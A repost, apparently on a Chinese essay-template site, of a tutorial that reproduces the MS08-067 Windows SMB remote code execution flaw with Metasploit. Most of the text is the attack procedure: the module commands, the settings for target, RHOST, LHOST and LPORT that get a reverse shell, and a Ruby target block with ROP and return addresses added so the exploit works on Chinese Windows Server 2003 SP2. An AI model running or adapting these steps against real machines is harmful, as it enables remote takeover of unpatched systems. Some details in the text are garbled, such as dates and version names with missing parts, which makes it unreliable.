1500字范文,内容丰富有趣,写作好帮手!
1500字范文 > MS08-067 远程执行代码 漏洞复现

MS08-067 远程执行代码 漏洞复现

时间:2019-02-28 11:49:17

相关推荐

MS08-067 远程执行代码 漏洞复现

漏洞编号:MS08-067披露日期:/10/22受影响的操作系统:Windows 2000;XP;Server ;Server ;目标系统Microsoft(R) Windows(R) Server , Enterprise Edition 使用工具metasploit 搜索漏洞库 search ms08_067

use 载入漏洞

通过“show options"可以查看所需要的设置;

yes 都是可填的

使用" show targets"可以查看渗透攻击模块可以成功攻击的平台;

我们这里可以看到 有 windos sp1,sp2 ,xp,2000 更具系统选择利用的payload

即 设置”set target 34"

设置攻击目标“set RHOST 目标ip地址”

设置回传端口"set LPORT 5000"

设置主机ip" set LHOST 主机ip“

运行exploit就可以看到成果了 等待反弹shell 但是这里遇到一个问题我的windows server 系统是中文的 不是英文的所以需要对ms08_067_netapi_ser_zh.rb

进行修改 重新打开终端 然后切换到已下目录:/usr/share/metasploit-framework/modules/exploits/windows/smb

在ms08_067_netapi_ser_zh.rb中增加以下代码,修改是4个指针地址

['Windows SP2 Chinese (NX)',

{

'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)

'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)

'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)

'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL

'Scratch' => 0x00020408,

}

],

输入

vimms08_067_netapi_ser_zh.rb

:set number

输入 /Windows SP2

这里我们帮他构建一个 652 -659行复制 输入 10y 回车

在p 复制到你想要的地方

在退出 exit 输入 msfconsole

从新复现上面的步骤 search targets 可以看到我们刚刚添加的中文利用版本

重复上面的步骤 发现

让 目标重启 应该目标机已经崩溃

尝试重启目标主机,执行相同操作,攻击成功。

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。